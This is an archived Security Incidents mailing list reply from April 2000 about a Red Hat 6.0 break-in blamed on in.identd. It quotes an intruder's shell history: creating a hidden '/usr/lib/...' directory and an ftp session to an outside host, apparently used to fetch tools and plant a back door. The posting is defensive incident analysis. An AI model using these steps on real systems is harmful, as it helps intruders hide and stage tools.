Security Incidents mailing list archives
Re: Rooted through in.identd on Red Hat 6.0
From: Erich.Meier () INFORMATIK UNI-ERLANGEN DE (Erich Meier)
Date: Thu, 20 Apr 2000 15:58:16 +0200
On Wed, Apr 19, 2000 at 05:02:13AM -0000, Del Elson wrote:
Hi, A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box.
Hmmm, I am not so sure, that identd is to blame.
RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently. The hacker left the usual trace in /.bash_history, which ran like: mkdir /usr/lib/... ; cd /usr/lib/...
Could it be, that this ftp connection caused an identd lookup done by the ftpd at 200.192.58.201? Then, in.identd would be not guilty.
ftp 200.192.58.201 21
[...]
... installing a back door and a partial cover of tracks. The only messages in /var/log/messages around the time were: Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201 Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201 Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 ... the IP address traces back to somewhere in Brazil.
Erich -- Erich Meier Erich.Meier () informatik uni-erlangen de http://www4.informatik.uni-erlangen.de/~meier/ Dilbert: "Today I started hating people in advance." Dogbert: "It saves time."
Current thread:
- huge scans from www.oix.com, (continued)
- huge scans from www.oix.com jose (Apr 28)
- I am popular today... Dirk Koopman (Apr 28)
- Re: I am popular today... Ryan Sweat (Apr 28)
- Analysis: AboveNet attacks Robert Graham (Apr 28)
- Re: I am popular today... Ville (Apr 29)
- Lots netbios scans (udp 137) Russell Fulton (Apr 30)
- High port UDP probe? Damian Gerow (Apr 25)
- Re: High port UDP probe? Mark Rowe (Apr 26)
- Lots of scan on port 9520 Erick Perez (Apr 25)
- possible bind worm? Roelof Temmingh (Apr 25)
- Re: Rooted through in.identd on Red Hat 6.0 Erich Meier (Apr 20)
- Re: Rooted through in.identd on Red Hat 6.0 Brett Glass (Apr 20)
- Tools to analyze "captured" binaries? -Reply Network Security (Apr 20)
- Re: Tools to analyze "captured" binaries? -Reply Ex Machina (Apr 22)
- Port 137 scans on the rise Bryan Andersen (Apr 20)
- Re: Port 137 scans on the rise horio shoichi (Apr 22)